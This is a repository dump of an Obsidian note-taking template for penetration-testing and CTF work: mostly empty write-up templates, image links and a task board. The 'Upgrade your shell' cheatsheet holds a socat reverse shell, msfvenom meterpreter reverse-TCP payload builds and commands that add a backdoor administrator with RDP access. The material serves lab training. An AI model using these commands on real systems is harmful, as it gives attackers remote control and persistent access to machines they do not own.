├── zzz_templates
├── test
│ └── test2
│ │ └── note.md
├── code-block.md
├── HTB-challenge.md
├── Link test.md
├── PT-vuln-template.md
└── HTB-machine.md
├── Labs
├── Lab 1 - Example
│ ├── Credential list.md
│ ├── Network 1
│ │ ├── _Network 1 discovered IPs.md
│ │ ├── attachments
│ │ │ ├── 1.png
│ │ │ ├── 2.png
│ │ │ ├── 3.png
│ │ │ ├── 4.png
│ │ │ ├── 5.png
│ │ │ ├── Icon.png
│ │ │ ├── 1 (2).png
│ │ │ ├── 2 (2).png
│ │ │ ├── IconTable.png
│ │ │ ├── 2020-07-22-23-01-43.png
│ │ │ ├── 2020-07-22-23-04-20.png
│ │ │ ├── 2020-07-22-23-26-40.png
│ │ │ ├── 2020-07-22-23-27-10.png
│ │ │ ├── 18471753064989ce956ecd9d34bd149b.png
│ │ │ ├── 1cd90c62496ddfac40291e3ccdca6c9f.png
│ │ │ ├── 5f2268f30a39e52d1896668473c6d3b7.png
│ │ │ └── f22d6b4d0d6c7ddd22d3418e69733305.png
│ │ ├── Legacy.md
│ │ ├── Buff.md
│ │ └── Writeup.md
│ ├── Network 3
│ │ ├── attachments
│ │ │ ├── 1.png
│ │ │ ├── 10.png
│ │ │ ├── 11.png
│ │ │ ├── 2.png
│ │ │ ├── 3.png
│ │ │ ├── 4.png
│ │ │ ├── 5.png
│ │ │ ├── 6.png
│ │ │ ├── 7.png
│ │ │ ├── 8.png
│ │ │ ├── 9.png
│ │ │ ├── tabby.png
│ │ │ ├── traceback.jpeg
│ │ │ ├── 2020-06-22-14-47-45.png
│ │ │ ├── 2020-06-22-14-48-13.png
│ │ │ ├── 2020-06-22-14-59-19.png
│ │ │ ├── 2020-06-22-14-59-41.png
│ │ │ ├── 2020-06-22-16-11-37.png
│ │ │ ├── 2020-06-22-16-45-05.png
│ │ │ ├── 2020-06-22-16-45-57.png
│ │ │ └── 2020-06-29-23-27-45.png
│ │ ├── Traceback.md
│ │ └── Tabby.md
│ ├── Network 2
│ │ ├── attachments
│ │ │ ├── exploit.png
│ │ │ ├── postman.png
│ │ │ ├── pspy64.png
│ │ │ ├── ONA_vers.png
│ │ │ ├── OpenAdmin.png
│ │ │ ├── internal.png
│ │ │ ├── privesc_1.png
│ │ │ ├── privesc_2.png
│ │ │ ├── ssh_jimmy.png
│ │ │ ├── joanna_RSA.png
│ │ │ ├── joanna_user.png
│ │ │ ├── postman_icon.png
│ │ │ ├── searchsploit.png
│ │ │ ├── OpenAdmin_Icon.png
│ │ │ ├── database_settings.png
│ │ │ ├── internal_browser.png
│ │ │ ├── sites-available.png
│ │ │ ├── 2020-02-26_22-23-34.png
│ │ │ ├── 2020-02-26_22-24-18.png
│ │ │ ├── 2020-02-27_09-46-23.png
│ │ │ ├── 2020-02-27_10-55-40.png
│ │ │ ├── 2020-02-27_11-20-28.png
│ │ │ └── joanna_ssh_bruteforce.png
│ │ ├── Postman.md
│ │ └── OpenAdmin.md
│ ├── LAB 1.canvas
│ └── LAB 1.md
└── Lab 2 - Vuln. Research
│ ├── attachments
│ ├── email.png
│ ├── phpmyinfo.png
│ ├── info-disclosure.png
│ ├── phpinfo-admin.png
│ ├── xss_CVE-2020-13980.png
│ └── path-traversal_security-storage.png
│ ├── opencart - CVE-2023-47444.md
│ └── OpenCart 4.0.2.3.canvas
├── attachments
└── rename-image.png
├── Cheatsheets
├── _See my real cheatsheet on GitHub.md
├── Upgrade your shell.md
└── Shell cheatsheet.md
├── Paste test.md
└── TODO Kanban.md
/zzz_templates/test/test2/note.md:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Credential list.md:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/zzz_templates/code-block.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | ```
--------------------------------------------------------------------------------
/attachments/rename-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/attachments/rename-image.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/_Network 1 discovered IPs.md:
--------------------------------------------------------------------------------
1 | - 10.10.10.198
2 | - 10.10.10.4
3 | - 10.10.10.138
4 |
5 |
--------------------------------------------------------------------------------
/Cheatsheets/_See my real cheatsheet on GitHub.md:
--------------------------------------------------------------------------------
1 | See my real cheatsheet on https://github.com/0xb120/cheatsheets_and_ctf-notes
2 |
--------------------------------------------------------------------------------
/Paste test.md:
--------------------------------------------------------------------------------
1 | Paste URL into selection:
2 | - [Paste here](https://0xbro.red/)
3 |
4 | Paste image rename:
5 | 
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/1.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/3.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/4.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/5.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/1.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/10.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/11.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/3.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/4.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/5.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/6.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/7.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/8.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/9.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/email.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/email.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/Icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/Icon.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/1 (2).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/1 (2).png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2 (2).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2 (2).png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/exploit.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/postman.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/postman.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/pspy64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/pspy64.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/tabby.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/tabby.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/phpmyinfo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/phpmyinfo.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/IconTable.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/IconTable.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/ONA_vers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/ONA_vers.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/internal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/internal.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/privesc_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/privesc_1.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/privesc_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/privesc_2.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/ssh_jimmy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/ssh_jimmy.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/joanna_RSA.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/joanna_RSA.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/joanna_user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/joanna_user.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/postman_icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/postman_icon.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/searchsploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/searchsploit.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/traceback.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/traceback.jpeg
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/info-disclosure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/info-disclosure.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/phpinfo-admin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/phpinfo-admin.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin_Icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin_Icon.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/database_settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/database_settings.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/internal_browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/internal_browser.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/sites-available.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/sites-available.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/xss_CVE-2020-13980.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/xss_CVE-2020-13980.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-01-43.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-01-43.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-04-20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-04-20.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-26-40.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-26-40.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-27-10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-27-10.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-23-34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-23-34.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-24-18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-24-18.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_09-46-23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_09-46-23.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_10-55-40.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_10-55-40.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_11-20-28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_11-20-28.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-47-45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-47-45.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-48-13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-48-13.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-19.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-41.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-41.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-11-37.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-11-37.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-05.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-57.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-57.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-29-23-27-45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-29-23-27-45.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/joanna_ssh_bruteforce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/joanna_ssh_bruteforce.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/path-traversal_security-storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/path-traversal_security-storage.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/18471753064989ce956ecd9d34bd149b.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/18471753064989ce956ecd9d34bd149b.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/1cd90c62496ddfac40291e3ccdca6c9f.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/1cd90c62496ddfac40291e3ccdca6c9f.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/5f2268f30a39e52d1896668473c6d3b7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/5f2268f30a39e52d1896668473c6d3b7.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/f22d6b4d0d6c7ddd22d3418e69733305.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/f22d6b4d0d6c7ddd22d3418e69733305.png
--------------------------------------------------------------------------------
/TODO Kanban.md:
--------------------------------------------------------------------------------
1 | ---
2 |
3 | kanban-plugin: board
4 |
5 | ---
6 |
7 | ## TODO
8 |
9 | - [ ] Search for loot on 192.168.1.25
10 | - [ ] Privilege escalation on 192.168.1.39
11 |
12 |
13 | ## WIP
14 |
15 |
16 |
17 | ## DONE
18 |
19 | - [ ] Map the network
20 | - [ ] Resolve DNS names to IPs
21 |
22 |
23 |
24 |
25 | %% kanban:settings
26 | ```
27 | {"kanban-plugin":"board","list-collapse":[false,false,false]}
28 | ```
29 | %%
--------------------------------------------------------------------------------
/zzz_templates/HTB-challenge.md:
--------------------------------------------------------------------------------
1 | ---
2 | Category:
3 | Difficulty:
4 | Platform:
5 | status:
6 | tags:
7 | ---
8 |
9 | >[!quote]
10 | >Challenge description
11 |
12 | # Setup
13 |
14 |
15 | # Information Gathering
16 |
17 | ## The application at-a-glance 🔍
18 |
19 |
20 |
21 | ## Source code review
22 |
23 |
24 |
25 | # Exploitation
26 |
27 | ## Bug 1
28 |
29 | >[!bug]
30 | >The bug
31 |
32 | ## Bug 2
33 |
34 | >[!bug]
35 | >The bug
36 |
37 |
38 | # Flag
39 |
40 | >[!success] Flag
41 | > `Th1s_15_th3_fl4g`
42 |
43 | # Video Writeup
44 |
45 |
46 |
47 | # Extra Miles
48 |
49 | ## Vulnerable code
--------------------------------------------------------------------------------
/zzz_templates/Link test.md:
--------------------------------------------------------------------------------
1 | Relative path
2 | in parent folder: [Paste test](../Paste%20test.md)
3 | in a sibling folder: [Shell cheatsheet](../Cheatsheets/Shell%20cheatsheet.md)
4 | in a deeper neighbouring folder: [image](../Labs/Lab%202%20-%20Vuln.%20Research/attachments/email.png)
5 | in a deeper child folder: [note](test/test2/note.md)
6 |
7 | Absolute path
8 | in parent folder: [Paste test](Paste%20test.md)
9 | in a sibling folder: [Shell cheatsheet](Cheatsheets/Shell%20cheatsheet.md)
10 | in a deeper neighbouring folder: [email](Labs/Lab%202%20-%20Vuln.%20Research/attachments/email.png)
11 | in a deeper child folder: [note](zzz_templates/test/test2/note.md)
12 |
13 | Shortest When Possible
14 | in parent folder: [Paste test](Paste%20test.md)
15 | in a sibling folder: [Shell cheatsheet](Shell%20cheatsheet.md)
16 | in a deeper neighbouring folder: [email](email.png)
17 | in a deeper child folder: [note](note.md)
--------------------------------------------------------------------------------
/zzz_templates/PT-vuln-template.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ### [Severity] Vulnerability title
4 |
5 | #### Description
6 |
7 | Summary of the vulnerability
8 |
9 | | Vuln ID | ID-001 |
10 | | ------------ | ----------------- |
11 | | Severity | High |
12 | | CVSSv4 Score | 7.5 - VECTOR |
13 | | URL | https://0xbro.red |
14 | | Reference | https://0xbro.red |
15 | | CVE or CWE | |
16 |
17 | #### Impact
18 |
19 | Vulnerability impact on the target
20 |
21 | #### Vulnerability details and root-cause
22 |
23 | Do this, do that, send this, send that
24 |
25 | ```http
26 | foo
27 | ```
28 |
29 | Do this, do that, send this, send that
30 |
31 | ```php
32 |
33 | ```
34 |
35 | ##### PoC
36 |
37 | ```py
38 | import os
39 |
40 | def main:
41 | pass
42 | ```
43 |
44 | #### Remediation
45 |
46 | Follow best practices
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/zzz_templates/HTB-machine.md:
--------------------------------------------------------------------------------
1 | ---
2 | os:
3 | status:
4 | tags:
5 | aliases:
6 | ---
7 | # Resolution summary
8 |
9 | >[!summary]
10 | >- Step 1
11 | >- Step 2
12 |
13 | ## Improved skills
14 |
15 | - Skill 1
16 | - Skill 2
17 |
18 | ## Used tools
19 |
20 | - nmap
21 | - gobuster
22 |
23 |
24 | ---
25 |
26 | # Information Gathering
27 |
28 | Scanned all TCP ports:
29 |
30 | ```bash
31 |
32 | ```
33 |
34 | Enumerated open TCP ports:
35 |
36 | ```bash
37 |
38 | ```
39 |
40 | Enumerated top 200 UDP ports:
41 |
42 | ```bash
43 |
44 | ```
45 |
46 | ---
47 |
48 | # Enumeration
49 |
50 | ## Port 80 - HTTP (Apache)
51 |
52 |
53 | ---
54 |
55 | # Exploitation
56 |
57 | ## SQL Injection
58 |
59 |
60 | ---
61 |
62 | # Lateral Movement to xxx
63 |
64 | ## Local enumeration
65 |
66 |
67 | ## Lateral movement vector
68 |
69 | ---
70 |
71 | # Privilege Escalation to xxx
72 |
73 | ## Local enumeration
74 |
75 |
76 | ## Privilege Escalation vector
77 |
78 |
79 | ---
80 |
81 | # Trophy
82 |
83 | {{image}}
84 |
85 | >[!todo] **User.txt**
86 | >flag
87 |
88 | >[!todo] **Root.txt**
89 | >flag
90 |
91 | **/etc/shadow**
92 |
93 | ```bash
94 |
95 | ```
--------------------------------------------------------------------------------
/Cheatsheets/Upgrade your shell.md:
--------------------------------------------------------------------------------
1 | Most [netcat](../Tools/netcat.md)-like tools provide a non-interactive shell, which means that programs that require user input, such as many file transfer programs or `su` and `sudo`, tend to work poorly, if at all. Non-interactive shells also lack useful features like tab completion and job control. It is always a good idea to upgrade any non-interactive shell to an interactive one.
2 |
3 | # Linux
4 |
5 | ## Python PTY
6 |
7 | ```python
8 | python -c 'import pty; pty.spawn("/bin/bash")'
9 | python3 -c 'import pty; pty.spawn("/bin/bash")'
10 | ```
11 |
12 | ## TERM and SHELL exports
13 |
14 | ```bash
15 | SHELL=/bin/bash script -q /dev/null
16 |
17 | ^Z
18 | stty raw -echo; fg
19 | export SHELL=bash
20 | export TERM=xterm-256color
21 | ```
22 |
23 | ## socat
24 |
25 | ```bash
26 | #Listener:
27 | socat file:`tty`,raw,echo=0 tcp-listen:4444
28 |
29 | #Victim:
30 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
31 | ```
32 |
33 | ## Fix rows and columns
34 |
35 | From a clean terminal:
36 |
37 | ```bash
38 | ┌──(kali㉿kali)-[~/…/lab/ntwk/it.local/10.1.1.1]
39 | └─$ stty -a
40 | speed 38400 baud; rows 60; columns 235; line = 0;
41 | intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = ; eol2 = ; swtch = ; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
42 | -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
43 | -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
44 | opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
45 | isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
46 | ```
47 |
48 | From the "malformed" terminal:
49 |
50 | ```bash
51 | www-data@luigi:/var/www$ stty rows 60 columns 235
52 | stty rows 60 columns 235
53 | ```
54 |
55 | ---
56 |
57 | # Windows:
58 |
59 | ## Rlwrap [^1]
60 |
61 | [^1]: https://github.com/hanslub42/rlwrap
62 |
63 | ```bash
64 | ┌──(kali㉿kali)-[~/…/lab/ntwk/it.local/10.1.1.1]
65 | └─$ rlwrap nc -nlvp 443
66 | ```
67 |
68 | ## meterpreter
69 |
70 | ```bash
71 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter.exe
72 | msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter.exe
73 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter-x64.exe
74 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter-x64.exe
75 | ```
76 |
77 | ## RDP
78 |
79 | ```powershell
80 | net user maoutis Qwerty123! /add
81 | net localgroup Administrators maoutis /add
82 | net localgroup "Remote Desktop Users" maoutis /ADD
83 | ```
